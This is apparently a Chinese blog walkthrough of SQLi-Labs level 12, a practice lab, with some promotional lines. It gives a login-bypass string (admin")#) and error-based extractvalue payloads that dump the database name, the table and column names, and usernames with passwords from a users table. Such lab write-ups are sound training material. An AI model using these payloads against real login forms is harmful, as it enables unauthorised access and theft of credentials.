(1)检测闭合方式:在username上输入" admin" "

SQLI DUMB SERIES-12 随笔 第1张

SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。

说明输入的username后还有双引号和括号

方法一:

(2)通过其他途径知道用户名即可。如 输入" admin")# "

SQLI DUMB SERIES-12 随笔 第2张

方法二:

(3)构造即可闭合又可报错的语句,在username处输入

爆库payload:

admin"  and extractvalue(1,concat(0x7e,(select database())))  and "

 SQLI DUMB SERIES-12 随笔 第3张

爆表名payload:

admin" and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and "

 SQLI DUMB SERIES-12 随笔 第4张

爆user表的列名payload:

admin"  and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')))  and "

 SQLI DUMB SERIES-12 随笔 第5张

爆user表值payload:

admin"  and extractvalue(1,concat(0x7e,(select group_concat(username,'~',password) from users)))  and "

 SQLI DUMB SERIES-12 随笔 第6张

其他值

SQLI DUMB SERIES-12 随笔 第7张

扫码关注我们
微信号:SRE实战
拒绝背锅 运筹帷幄